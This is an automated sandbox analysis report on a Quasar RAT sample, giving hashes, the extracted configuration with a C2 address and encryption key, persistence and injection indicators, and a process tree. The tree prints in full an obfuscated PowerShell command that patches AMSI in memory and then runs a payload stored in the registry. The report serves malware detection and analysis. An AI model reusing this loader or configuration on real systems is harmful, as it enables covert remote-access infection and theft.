quasar | e297f022413aee60290878fd253b68ecb9af7e7919ddae6093a977c10b47ca07

Analysis

max time kernel
150s
max time network
144s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23/04/2024, 20:29

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

real.exe
Size

409KB
MD5

16be7896ffd96f3c15ca40ff3243674f
SHA1

321e82e120535d5f48430284804d5aca5f78d8c7
SHA256

e297f022413aee60290878fd253b68ecb9af7e7919ddae6093a977c10b47ca07
SHA512

6dda93f0e4e47caf40bf15372fd8edee36b8a66d4d6ee3a6e1400c9297cbaa32584c6f8c97e2e76c4e3cd8b195d8e9cbb898870559e7a7177db97eb8c0a521ad
SSDEEP

12288:8Bwz9Fx/nIlyLcnRKIZduz8IWQygCLZG9:8+J0sLYpuz8bQygB

Score

10^/10

quasar rslaves spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RSlaves

147.185.221.19:33587

Mutex

$Sxr-hphEGEvqSUG7C0u46T

Attributes

encryption_key
6jSzwDnfbfYdZp3ml07G
install_name
WDefenderUpdater.exe
log_directory
UpdLog
reconnect_delay
3000
startup_key
WindowsBIOSupd
subdirectory
Microsoft

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/4240-0-0x00000000005B0000-0x000000000061C000-memory.dmp	family_quasar
behavioral1/files/0x000900000001ab61-10.dat	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 3512 created 580	3512	powershell.EXE	5
PID 2432 created 2284	2432	svchost.exe	92
PID 2432 created 5100	2432	svchost.exe	94

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
836	WDefenderUpdater.exe
224	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3512 set thread context of 4040	3512	powershell.EXE	83

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2412	schtasks.exe
1028	schtasks.exe
4364	SCHTASKS.exe

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3512	powershell.EXE
3512	powershell.EXE
3512	powershell.EXE
3512	powershell.EXE
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
2432	svchost.exe
2432	svchost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
3328	WerFault.exe
4040	dllhost.exe
4040	dllhost.exe
2432	svchost.exe
2432	svchost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
4040	dllhost.exe
836	WDefenderUpdater.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe
512	WerFault.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4240	real.exe
Token: SeDebugPrivilege	836	WDefenderUpdater.exe
Token: SeDebugPrivilege	3512	powershell.EXE
Token: SeDebugPrivilege	3512	powershell.EXE
Token: SeDebugPrivilege	4040	dllhost.exe
Token: SeCreateGlobalPrivilege	1928	dwm.exe
Token: SeChangeNotifyPrivilege	1928	dwm.exe
Token: 33	1928	dwm.exe
Token: SeIncBasePriorityPrivilege	1928	dwm.exe
Token: SeCreateGlobalPrivilege	2788	dwm.exe
Token: SeChangeNotifyPrivilege	2788	dwm.exe
Token: 33	2788	dwm.exe
Token: SeIncBasePriorityPrivilege	2788	dwm.exe
Token: SeDebugPrivilege	3328	WerFault.exe
Token: SeDebugPrivilege	512	WerFault.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe
2788	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
836	WDefenderUpdater.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4240 wrote to memory of 2412	4240	real.exe	73
PID 4240 wrote to memory of 2412	4240	real.exe	73
PID 4240 wrote to memory of 2412	4240	real.exe	73
PID 4240 wrote to memory of 836	4240	real.exe	75
PID 4240 wrote to memory of 836	4240	real.exe	75
PID 4240 wrote to memory of 836	4240	real.exe	75
PID 836 wrote to memory of 1028	836	WDefenderUpdater.exe	76
PID 836 wrote to memory of 1028	836	WDefenderUpdater.exe	76
PID 836 wrote to memory of 1028	836	WDefenderUpdater.exe	76
PID 4240 wrote to memory of 224	4240	real.exe	78
PID 4240 wrote to memory of 224	4240	real.exe	78
PID 4240 wrote to memory of 224	4240	real.exe	78
PID 4240 wrote to memory of 4364	4240	real.exe	79
PID 4240 wrote to memory of 4364	4240	real.exe	79
PID 4240 wrote to memory of 4364	4240	real.exe	79
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 3512 wrote to memory of 4040	3512	powershell.EXE	83
PID 4040 wrote to memory of 580	4040	dllhost.exe	5
PID 4040 wrote to memory of 648	4040	dllhost.exe	7
PID 4040 wrote to memory of 748	4040	dllhost.exe	10
PID 4040 wrote to memory of 908	4040	dllhost.exe	13
PID 4040 wrote to memory of 980	4040	dllhost.exe	14
PID 4040 wrote to memory of 364	4040	dllhost.exe	15
PID 4040 wrote to memory of 636	4040	dllhost.exe	16
PID 4040 wrote to memory of 1084	4040	dllhost.exe	18
PID 4040 wrote to memory of 1092	4040	dllhost.exe	19
PID 4040 wrote to memory of 1136	4040	dllhost.exe	20
PID 4040 wrote to memory of 1176	4040	dllhost.exe	21
PID 648 wrote to memory of 2400	648	lsass.exe	44
PID 4040 wrote to memory of 1228	4040	dllhost.exe	22
PID 4040 wrote to memory of 1308	4040	dllhost.exe	23
PID 4040 wrote to memory of 1340	4040	dllhost.exe	24
PID 648 wrote to memory of 2400	648	lsass.exe	44
PID 4040 wrote to memory of 1360	4040	dllhost.exe	25
PID 4040 wrote to memory of 1388	4040	dllhost.exe	26
PID 4040 wrote to memory of 1496	4040	dllhost.exe	27
PID 4040 wrote to memory of 1540	4040	dllhost.exe	28
PID 4040 wrote to memory of 1564	4040	dllhost.exe	29
PID 580 wrote to memory of 1928	580	winlogon.exe	86
PID 580 wrote to memory of 1928	580	winlogon.exe	86
PID 4040 wrote to memory of 1928	4040	dllhost.exe	86
PID 648 wrote to memory of 2400	648	lsass.exe	44
PID 4040 wrote to memory of 1620	4040	dllhost.exe	30
PID 4040 wrote to memory of 1700	4040	dllhost.exe	31
PID 4040 wrote to memory of 1716	4040	dllhost.exe	32
PID 4040 wrote to memory of 1848	4040	dllhost.exe	33
PID 4040 wrote to memory of 1856	4040	dllhost.exe	34
PID 648 wrote to memory of 2400	648	lsass.exe	44
PID 4040 wrote to memory of 1940	4040	dllhost.exe	35
PID 4040 wrote to memory of 1956	4040	dllhost.exe	36
PID 4040 wrote to memory of 900	4040	dllhost.exe	37
PID 4040 wrote to memory of 2096	4040	dllhost.exe	38
PID 4040 wrote to memory of 2228	4040	dllhost.exe	39
PID 4040 wrote to memory of 2244	4040	dllhost.exe	40
PID 580 wrote to memory of 2788	580	winlogon.exe	88
PID 580 wrote to memory of 2788	580	winlogon.exe	88
PID 4040 wrote to memory of 2788	4040	dllhost.exe	88
PID 648 wrote to memory of 2400	648	lsass.exe	44

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:980
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{651dcb02-b01d-4c6f-9019-c01811fd73c0}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4040
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2788

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1084
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aVjAinlrNNqI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MpvxcJgWQvyZVv,[Parameter(Position=1)][Type]$kdRZDTumjB)$nWoRrWUxuNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+'e'+'c'+'t'+[Char](101)+'d'+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+'yp'+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+'e'+'a'+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+[Char](111)+'C'+[Char](108)+'a'+'s'+''+'s'+'',[MulticastDelegate]);$nWoRrWUxuNu.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$MpvxcJgWQvyZVv).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$nWoRrWUxuNu.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$kdRZDTumjB,$MpvxcJgWQvyZVv).SetImplementationFlags('R'+[Char](117)+'nti'+[Char](109)+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');Write-Output $nWoRrWUxuNu.CreateType();}$wnJwkmyMaMnBL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'Nat'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$xqbVVeJgtistqf=$wnJwkmyMaMnBL.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YnDbSxKrVypkjnaBfvL=aVjAinlrNNqI @([String])([IntPtr]);$mhKsDBlhGmcaoShFsHSebz=aVjAinlrNNqI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gGLGiVNGNnp=$wnJwkmyMaMnBL.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$drPITyYyhoKHNv=$xqbVVeJgtistqf.Invoke($Null,@([Object]$gGLGiVNGNnp,[Object]('L'+'o'+''+[Char](97)+'dLi'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$DITsbIAxTYVoieYot=$xqbVVeJgtistqf.Invoke($Null,@([Object]$gGLGiVNGNnp,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$UcBoPLN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($drPITyYyhoKHNv,$YnDbSxKrVypkjnaBfvL).Invoke('ams'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+'l'+'');$zQzQwxTkMFrNYdhNy=$xqbVVeJgtistqf.Invoke($Null,@([Object]$UcBoPLN,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$rtlSuGxTVN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DITsbIAxTYVoieYot,$mhKsDBlhGmcaoShFsHSebz).Invoke($zQzQwxTkMFrNYdhNy,[uint32]8,4,[ref]$rtlSuGxTVN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zQzQwxTkMFrNYdhNy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DITsbIAxTYVoieYot,$mhKsDBlhGmcaoShFsHSebz).Invoke($zQzQwxTkMFrNYdhNy,[uint32]8,0x20,[ref]$rtlSuGxTVN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+'ta'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1388
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1940

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1956

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2368

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2904

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3160

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3292
- C:\Users\Admin\AppData\Local\Temp\real.exe
  "C:\Users\Admin\AppData\Local\Temp\real.exe"
  2⤵
